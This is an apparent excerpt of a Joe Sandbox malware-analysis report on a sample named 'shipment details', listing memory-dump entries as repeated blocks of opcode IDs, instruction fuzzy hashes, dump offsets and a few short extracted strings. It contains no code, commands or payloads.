                                                                                • Instruction ID: a93cd657a314d96fadfc351881fa0442db0d98eaf796b2d0a775f72d9c70ccb3
                                                                                • Opcode Fuzzy Hash: e863f58e6d3c9c7950a5bfe576c72a76ac996377a1b2bd28978ee375877d14d7
                                                                                • Instruction Fuzzy Hash: 78213471514608EFCB15CFA8C9C0B26BB65FB84314F20C96DEA490B392C77AD446CA62
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e189201b3282c4251fb5fa8bd675faa38f3003ce828451202104f0ea56659216
                                                                                • Instruction ID: 5de808f01727a4e61349293060536bf827e7c2be353d03f4bdb5c2d4753ff73e
                                                                                • Opcode Fuzzy Hash: e189201b3282c4251fb5fa8bd675faa38f3003ce828451202104f0ea56659216
                                                                                • Instruction Fuzzy Hash: 4B213572605149CFCB12AF68E844BAF7BB1FB84319F008469E905CB385CB35CD15DBA4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 81d34b7c73ec5109544f72b7d2098964aa92e125100d0fb5de29102b8cc1f764
                                                                                • Instruction ID: 320e6c0872c1490265070e399fbc7afbe06cb1ad2540f47d06b4c65d6fc6dde5
                                                                                • Opcode Fuzzy Hash: 81d34b7c73ec5109544f72b7d2098964aa92e125100d0fb5de29102b8cc1f764
                                                                                • Instruction Fuzzy Hash: F1216830E05249DFDB05CFB9D550AEEBFB6AF89308F148069E415E6394DB30D941CB20
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f0e366575556f7fa552d4dda013b2529ea24927c9d59c55677e89f31fb0e4ea0
                                                                                • Instruction ID: 1b84a839506a7277339db2491d77436a8b2a066f42ec59c3d074b190340640c9
                                                                                • Opcode Fuzzy Hash: f0e366575556f7fa552d4dda013b2529ea24927c9d59c55677e89f31fb0e4ea0
                                                                                • Instruction Fuzzy Hash: 44118172B101089BCB149F59DC44BDEBBBAFB8C315F144026E916E7390DB719C14CB94
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: be35e129e2cef77fdfb5a8f2d425949ffc654b061184588550fc008d5eda71b7
                                                                                • Instruction ID: 942f93671ad444d507699e3eabe195b7b9176bcac615ad1370d78a0b2c70a40a
                                                                                • Opcode Fuzzy Hash: be35e129e2cef77fdfb5a8f2d425949ffc654b061184588550fc008d5eda71b7
                                                                                • Instruction Fuzzy Hash: 3A215BB1D0120A9FDB05EFA9E64469EBFF6FF41304F4085A9C0589B369E7749A09CF81
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4878f8cbbf2bef12469599f175880ead11f63abd8f34f49037a0faeb9cc0b599
                                                                                • Instruction ID: caebdc1e7473ede920db9850f9b19cb9cc949630acd6c112a40fde7057d4d979
                                                                                • Opcode Fuzzy Hash: 4878f8cbbf2bef12469599f175880ead11f63abd8f34f49037a0faeb9cc0b599
                                                                                • Instruction Fuzzy Hash: 79110476704612AFD7199B2AD85893EBBA6FFC57693194478E906CB360CF30DC028B94
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 9e0c227c223d706d0105c53ab9f631ac9507f7229ddbda4490c35252426c75f3
                                                                                • Instruction ID: ef088eee4e87b2b762f51007e975f95880a08a6d8d99a79a3a7d4f45e5fc8f2c
                                                                                • Opcode Fuzzy Hash: 9e0c227c223d706d0105c53ab9f631ac9507f7229ddbda4490c35252426c75f3
                                                                                • Instruction Fuzzy Hash: 0121DD74D1060A8FCB00EFA9D9446EEBBF4FB49301F10562AD849B2310EB345A95CBA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fde4be1eb8022e8c92ea2b0cc72cabf1168cecd73e7927dbb75c7499a3692a15
                                                                                • Instruction ID: cf8c94f3b20aa2239f7b5fb6e80bd9f09202806290821b1601733d5026ce3624
                                                                                • Opcode Fuzzy Hash: fde4be1eb8022e8c92ea2b0cc72cabf1168cecd73e7927dbb75c7499a3692a15
                                                                                • Instruction Fuzzy Hash: F9116A70D0010A8FDB05EFA9E644A9EBBF6FF40304F00C569C1589B369EB349A09CF81
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bab59e69fe8f934d5a8db9fb0279be4d39cd44c194b2e581d4835a739c93e4c1
                                                                                • Instruction ID: 554b8539ba0c9f414a12136fa7e0244c0e40df7dce2d0c928fcc8c91d6702ed2
                                                                                • Opcode Fuzzy Hash: bab59e69fe8f934d5a8db9fb0279be4d39cd44c194b2e581d4835a739c93e4c1
                                                                                • Instruction Fuzzy Hash: DE01D432B001196BDB05AE98DC00BEF3B9AEBC8654F14802AF605D7344DA758C1697A5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 74c487ba10caec1c6d0a33f90c87cff8cd5b3a8ccf63b6304d2c8f1ff461be5b
                                                                                • Instruction ID: 2276b0ab3562c68d0fe80d06af55f27fbab414b1b31def2c169d677ad3648cfd
                                                                                • Opcode Fuzzy Hash: 74c487ba10caec1c6d0a33f90c87cff8cd5b3a8ccf63b6304d2c8f1ff461be5b
                                                                                • Instruction Fuzzy Hash: 0FF021313006104BDF155A2ED85462A77DEEFC89593054479E545C7371EF20CC038384
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e37a1b6993c115d840bfe5f79973e45c2a34747bdc7b383841a009ff922305af
                                                                                • Instruction ID: 622c573170bf8eebbde4bc4b091729ccb7fd41979233f7587a534b3061528f3e
                                                                                • Opcode Fuzzy Hash: e37a1b6993c115d840bfe5f79973e45c2a34747bdc7b383841a009ff922305af
                                                                                • Instruction Fuzzy Hash: 72014879D0020ADFDF40DFE8E945AAEBBB2FB48304F104125E914A3354D7359A16CF91
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 23d671d059114c4cc91022cb59b7f84b0b042c62cab04ce248551236809184c5
                                                                                • Instruction ID: cba27ef90240931944a590c63b3d1a2d9a37dee99bd8319b494ba6658874af87
                                                                                • Opcode Fuzzy Hash: 23d671d059114c4cc91022cb59b7f84b0b042c62cab04ce248551236809184c5
                                                                                • Instruction Fuzzy Hash: 40F03A70E11125CFCB94EF7CC40455E7BF8AF4822476144A9D409DB361EB30DD008BD1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2cff49148e0810fe8a49953915bafedeb6365bd40bb815dc5fea7b9d8d3eb6cd
                                                                                • Instruction ID: 56af67dbaad4a68228e504ca144f8a42d503c7665ef032c9f0ed1d1631e83b3f
                                                                                • Opcode Fuzzy Hash: 2cff49148e0810fe8a49953915bafedeb6365bd40bb815dc5fea7b9d8d3eb6cd
                                                                                • Instruction Fuzzy Hash: 4EE08631D1016B86C715DBA0E8045EEF734EFD5364F554676D41876140EB34259AC691
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 587299266c8a80326ed3140a1c5b3946798dd4c608871c70a0e27b301c1adab3
                                                                                • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                                                • Opcode Fuzzy Hash: 587299266c8a80326ed3140a1c5b3946798dd4c608871c70a0e27b301c1adab3
                                                                                • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 6f9a8379ef9af7d9af118506bde694f129323ccdb7bf50ae558dfba72338abee
                                                                                • Instruction ID: de678a9b1a41221b1044206a21700faf76e4b6cafe82163fbec4db0ffc76f398
                                                                                • Opcode Fuzzy Hash: 6f9a8379ef9af7d9af118506bde694f129323ccdb7bf50ae558dfba72338abee
                                                                                • Instruction Fuzzy Hash: 7FD05E324983498ED209F734EE06B963B1EEB80618F689524D0064635EEEBC980A8650
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a98ba243081ba923f370a278fbc0319d4d958c28441bf237b369fa309399709d
                                                                                • Instruction ID: 5cd8647b8bba4dca66adbcae8429daf42f12c20b6a532b48c034e5151b3e2cce
                                                                                • Opcode Fuzzy Hash: a98ba243081ba923f370a278fbc0319d4d958c28441bf237b369fa309399709d
                                                                                • Instruction Fuzzy Hash: 4CD0673AB40018AFCB049F98EC408DDFB76FB98221B048517E915E3261C6319925DB50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19c9d5d91937abddf78e5f349eea76507a946d6d5200585562d9de209924821a
                                                                                • Instruction ID: f050976f22689375c99113ee858b79edf20b99f9dcdd83f54fd8fa8214a43a0c
                                                                                • Opcode Fuzzy Hash: 19c9d5d91937abddf78e5f349eea76507a946d6d5200585562d9de209924821a
                                                                                • Instruction Fuzzy Hash: 5AC01232454709CEC549FB65FE45955372EAAC06087548A2091060675DEFB89C498694
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .5uq
                                                                                • API String ID: 0-910421107
                                                                                • Opcode ID: f513711184b816f6115a0fbb81f264910e148cbe4f1bda9d3b757e899ce5985e
                                                                                • Instruction ID: e110e1e4aec4689a11bba6636cbb17daa0a6b247dc60a11a7f413210e965aba8
                                                                                • Opcode Fuzzy Hash: f513711184b816f6115a0fbb81f264910e148cbe4f1bda9d3b757e899ce5985e
                                                                                • Instruction Fuzzy Hash: CA52AB74E01229CFDB64DF69C884BDDBBB2BB89304F1085E9D409AB265DB359E85CF40
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0d79a86f84a3d0d9f3a2dd2afc8ad7a779f481b912477e0a8874d2473a7f1e63
                                                                                • Instruction ID: 41ae80bc1655318a0a0a9be4a37fd6ef14b2564415ffc441e3cbd847fa8d5aab
                                                                                • Opcode Fuzzy Hash: 0d79a86f84a3d0d9f3a2dd2afc8ad7a779f481b912477e0a8874d2473a7f1e63
                                                                                • Instruction Fuzzy Hash: 6FC1F174E00218CFDB54DFA9D984B9DBBB6BF88304F1081A9D808AB365DB359E85CF11
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 7a0996053ba6f5d16cfede342cf9f52856b43432652aafa5bed1efa5d8bf3240
                                                                                • Instruction ID: ed91662d9da081743b77bb3033d776c35a11e39f83a0ab30a42536cce4663aa6
                                                                                • Opcode Fuzzy Hash: 7a0996053ba6f5d16cfede342cf9f52856b43432652aafa5bed1efa5d8bf3240
                                                                                • Instruction Fuzzy Hash: 7EC1B1B4E00218CFDB54DFA5D984B9DBBB2BF88304F1081A9D409AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 64d2d59651bfd30aa9b97a330b23e6bdb8b29bbd4d4db6a4f4a5eb7dd6e5cfc6
                                                                                • Instruction ID: cf4e59a4f845751c2c14f5bc45b8ad1e66587815a144c26794ce74dfc2ec97a9
                                                                                • Opcode Fuzzy Hash: 64d2d59651bfd30aa9b97a330b23e6bdb8b29bbd4d4db6a4f4a5eb7dd6e5cfc6
                                                                                • Instruction Fuzzy Hash: 43C1C0B4E00218CFDB54DFA5D984B9DBBB2BF88304F1081A9D808AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 2a7bb17fed5266c61cdd39b1f51bddbe41c3486478188a036f5bcade635fb55f
                                                                                • Instruction ID: c4d291b496d51464befe251d57e262c48e8228cf697f9a830cb62d116bbe6e55
                                                                                • Opcode Fuzzy Hash: 2a7bb17fed5266c61cdd39b1f51bddbe41c3486478188a036f5bcade635fb55f
                                                                                • Instruction Fuzzy Hash: C5C1A0B4E00218CFDB54DFA5D984B9DBBB2BF89304F1081A9D409AB365EB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 69d96380030d9a896c1d946ccc9a5a1954f917c5d2d7493ca39b71c8f91e10f7
                                                                                • Instruction ID: e3136ff8eb5fd136be2bee5e43feb08e057ff67b23d2749623ce99131fc05914
                                                                                • Opcode Fuzzy Hash: 69d96380030d9a896c1d946ccc9a5a1954f917c5d2d7493ca39b71c8f91e10f7
                                                                                • Instruction Fuzzy Hash: AEC1D174E00218CFDB54DFA5D944BADBBB6BF88304F1081A9D409AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e349163278f007bfb1e3db9958d7a1653641d8adf54dab4b92465ef5adb144db
                                                                                • Instruction ID: 2aeeda034a90c2e88ad615d15ac68fe3caa3fb289bd7c853a892aa03fd4814e0
                                                                                • Opcode Fuzzy Hash: e349163278f007bfb1e3db9958d7a1653641d8adf54dab4b92465ef5adb144db
                                                                                • Instruction Fuzzy Hash: AAC1B1B4E00218CFDB54DFA5D984B9DBBB2BF89304F1081A9D409AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1cbfe1926428cb334f20443857ee022223cf2474c0e566e52b2beebe17892cb5
                                                                                • Instruction ID: d76c2d6cfc09bcef00704f026ee59347e56a0a5b95a8bf4a5e2cec08f36314ce
                                                                                • Opcode Fuzzy Hash: 1cbfe1926428cb334f20443857ee022223cf2474c0e566e52b2beebe17892cb5
                                                                                • Instruction Fuzzy Hash: 35C1C1B4E00218CFDB54DFA5D944BADBBB6BF88304F1081A9D809AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1a224103a53590365162ebbb33f0144aa652eb83bb51527dd0bc202c95194d1b
                                                                                • Instruction ID: c7709099cb2c9cf87e9e9dc5101b4cc9a3d1b4e9c3b7585ca79abaf9cf11e8bc
                                                                                • Opcode Fuzzy Hash: 1a224103a53590365162ebbb33f0144aa652eb83bb51527dd0bc202c95194d1b
                                                                                • Instruction Fuzzy Hash: 06C1C1B4E00218CFDB54DFA5D994B9DBBB6BF88304F1081A9D808AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 97410835dc0113302e48d2da66cd51fdabf6e0ce25ff7a7daaaa33a19b178409
                                                                                • Instruction ID: b0fe8ad45940f8e6a07b0928d4eed135fafda1815d2d8172f5c408a9ad71f184
                                                                                • Opcode Fuzzy Hash: 97410835dc0113302e48d2da66cd51fdabf6e0ce25ff7a7daaaa33a19b178409
                                                                                • Instruction Fuzzy Hash: 8DC1C0B4E00218CFDB54DFA5D984B9DBBB2BF89304F1081A9D409AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d5ee78f2df42444beae4df6aceab345f235ec4b2be7c4b6b817e4e21aa2ee02b
                                                                                • Instruction ID: 947004acfbbcb91a668209896cfb8c0630b3b397c6fd1605ad72a458eee76bb7
                                                                                • Opcode Fuzzy Hash: d5ee78f2df42444beae4df6aceab345f235ec4b2be7c4b6b817e4e21aa2ee02b
                                                                                • Instruction Fuzzy Hash: A4C1C174E00218CFDB54DFA5D944BADBBB6BF88304F1081A9D809AB365EB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 921b797a5684c74aefdff96408da3f3ffb451d8b1c101affa83281d6ba38a89e
                                                                                • Instruction ID: 50add370dfb8dcecb129b55286e196976e415d0946c026d0371af999c3979541
                                                                                • Opcode Fuzzy Hash: 921b797a5684c74aefdff96408da3f3ffb451d8b1c101affa83281d6ba38a89e
                                                                                • Instruction Fuzzy Hash: F7C1C1B4E00218CFDB54DFA9D944B9DBBB2BF89304F1081A9D808AB365DB359E85CF50
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4529301009.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_6bd0000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f61e631d60cf6624596a4c152d1588f32bcc4204d0dfb8016c22bc616cbdbcbe
                                                                                • Instruction ID: 21861b8bd5f20ede505e1df4c8fdeaeafba320356a78b33828375537136f7167
                                                                                • Opcode Fuzzy Hash: f61e631d60cf6624596a4c152d1588f32bcc4204d0dfb8016c22bc616cbdbcbe
                                                                                • Instruction Fuzzy Hash: 2CC1C1B4E00218CFDB54DFA5D994B9DBBB2BF89304F1081A9D408AB365DB359E85CF50
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.4519780428.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_1330000_shipment details.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: \;]q$\;]q$\;]q$\;]q
                                                                                • API String ID: 0-2351511683
                                                                                • Opcode ID: b3a06b06eb6820c687362e093786a0c0b8384eca1b8716e5e3a75cd1a2a2b82d
                                                                                • Instruction ID: c746f3b699999ef96e37c99a57f9787505e51ded59f29075402fa141a849ec41
                                                                                • Opcode Fuzzy Hash: b3a06b06eb6820c687362e093786a0c0b8384eca1b8716e5e3a75cd1a2a2b82d
                                                                                • Instruction Fuzzy Hash: 2801F2B1740108AFD764CE2CC5819A537EABFC8B68725446AE545CB375DA31DD41C748